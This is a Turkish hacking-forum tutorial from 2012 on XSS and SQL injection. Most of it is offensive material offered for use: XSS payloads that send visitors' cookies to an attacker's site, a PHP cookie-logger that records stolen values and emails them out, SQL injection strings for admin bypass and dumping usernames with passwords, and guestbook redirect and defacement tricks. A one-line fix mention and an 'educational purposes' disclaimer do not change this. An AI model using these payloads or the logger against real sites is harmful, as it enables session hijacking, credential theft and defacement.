Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.





XSS - SQL Injection [Anlatım]

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 06-07-2012 18:44   #1
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Bruksel
Mesajlar
Konular

Teşekkür (Etti): 6
Teşekkür (Aldı): 70


XSS - SQL Injection [Anlatım]



XSS nedir ?

xss sistemlerdeki script açıklarıdır...
ARama Modullerinde , Profil Panellerinde haber modullerinde shutbox vs.. bulunur..
bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini sağlarız..

örn :

color=#0000ffhttp://localhost/hedefdeneme/index.php?content=<h1>SecurityatRawk****ldotcom

color=#0000ffhttp://localhost/asp-hedef/newcat.asp?tagx=<h1>SecurityatRawk****ldotcom

devam edelim...

Xss Hangi Sistemler Kullanılır..

Xss Genellikle Php-Nuke ya da Php ile yapılmış sistemlere kullanılır
ama Asp’de kullanılmaz anla**** gelmez. Asp İçin Daha Çok SQL İnjection Dediğimiz Tablo isimlerine
yapılam illegal girişimlerdir..

Biraz daha örnekleyerek Anlatalım..

Asp , Php farketmez :
">nedirbu<"font%20size=20>Hacked by ********%20:P</font>



basit bir arama scriptinde kullanılıcak açık..

Yukardaki Xss yi biraz daha açalım .(php)

( $_POST / $_SESSION , $_GET ) Php de arama yaparken verdiğimiz komut budur..

Session’da $username adlı bir değişken var diyelim.Sayfada echo’landığı $_SESSION[’variable’] şeklinde ekrana basılmadığı zaman url üzerinde sayfa.php?username=XSS girdiğimizde oturumdaki kullanıcıyı değil adres satırından gelen variable’ı ekrana basacaktır.

ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalıştırmak gerekir...

Güvenlik İçin :

strip_tags() ya da htmlspecialchars komutlarıyla bu açığı kapatabiliriz.


Java Scripti Neden Çalıştırırız :

Cookie Çalmak İçin ya da sayfayı yönlendirmek için ..
Örnekleyelim..

******************.********=’http://www.sizinsiteniz.com/xss/?’+escape(********.cookie)</script>

Cookie Almak İçin :

<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("mailadresiniz@mail.com","Şifre Geldi çip çip ","http://www.site.com/ekledik.txt",’From: color=#0000ffTaze_Kek@geldi.com’);
?>

chmod ayarını 777 yapmak lazım yoksa gelen cookie kaydetmez

Örnek :

:2082/login?user=********************.href= "http://www.siteniz.com/kekle.php?c=’escape(********. cookie)</script>

/users.php?f=1&s=1’******************.********=’htt p: //www.sizinsiteniz.com/xss/?’+escape(********.cookie)</script>&w=asc&d=50

comments.php?id=1"******************.********=’htt p: //www.sizinsiteniz.com/xss/?’+escape(********.cookie)</script>

/modules.php?f=1&s=1’<XML src= "">
:2082/login?user=********************.href= "http://www.siteniz.com/kekle.php?c=’escape(********. cookie)</script>


gibi

Asp İçin Biraz Daha Farklıdır SQL İnjectionla HTML İnjecte edilir ya da Admin Olarak Girdi Yapılabilir...

sifredegistir.asp?sifrem=şifre&newpwd=şifreyeni&ui d=123323453’+or+uid+like’%admin%’;--%00

Haber_detay.asp?size=0’+union+select+’1’,’1 ’,’1’,concat(uname||’-’||passwd)+as+i_name+’1’+’1’+ from+usertable+where+uname+like+’25


<FORM METHOD=POST ACTION="http://www.siteadresi.com/anket.asp?oyla=1" TARGET="so****rget" DEBUG=”666”>
<INPUT TYPE=HIDDEN NAME="Poll" VALUE="1">

şeklinde yapılacak Girdiler Anketlerde ya da Haber Yönetiminde Bir Girdi Kontrolu Yapılmıyosa Siteye Haber Elemeye Kadar gider...

kısaca XSS ya da Cros Site Script (CSS) Wep Programcısından Doğan Scirpt Açıklarıdır Diyebiliriz..

Bakınız :

LDU’nun Shubox Plugini Olan Sitelerde Html Tag’ları Çalıştırılıyordu Ve Sistem istediğimiz Bi Sayfaya Yönlendirilebiliyodu.

neocrome.net
Security advisory : Shoutbox plugin

bu açığı yaklaşık 2 hafta önce Memox İle Birlikte Güvenlik Testleri Yaparken Tarafımdan Bulunmuştu
Bunu Yanı Sıra Haber , Döküman ya da benzeri yazıların yazıldığı yerlerdede XSS vardı
neocrome ye mail attık bakalım bunun için bi eklenti çıkıcakmı

bu demek oluyoki yaptığımız Siteleri ya da scriptlerin güvenlik Önlemlerini iyi almak gerekir..
yoksa bir sahab uyandığınızda Hacked by Oturgaçlı ***üreç Yazısını Anasayfada Görmek İçten Bile değil

GuestBook , Ziyaretçi Defteri Ownz....

Bu tamamiyle XSS İçine Girmez türkiye ve diğer ülkerlde yaygın bi sistem
üyeler gelsin yazı yazsın diye yapmışlar
fakat mesaj yazılan Yerlerde html tagları ya da js (ja va script) kullanılabiliyor..
[code]
<**** http-equiv="*******" content="1;URL=http://www.xxx.com/">
[code]

ya da kullandığınız index olabilir yazıldığında ziyaretçi defteri egale edilebilir...

Şimdilik Bu Kadar Kafi İlerleyen Günlerde
Xss ve Cros Site Scriptin Tama**** Öğrenmeye Başlıcaz Vatanan Millete Hayırlı Olsun


Not : Burda yazılanlar tamamen egitim amaçlı olup kötüye kullanımından dogabilecek zararlardan kesinlikle uygulayan
kişi sorumludur.
postamble();
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau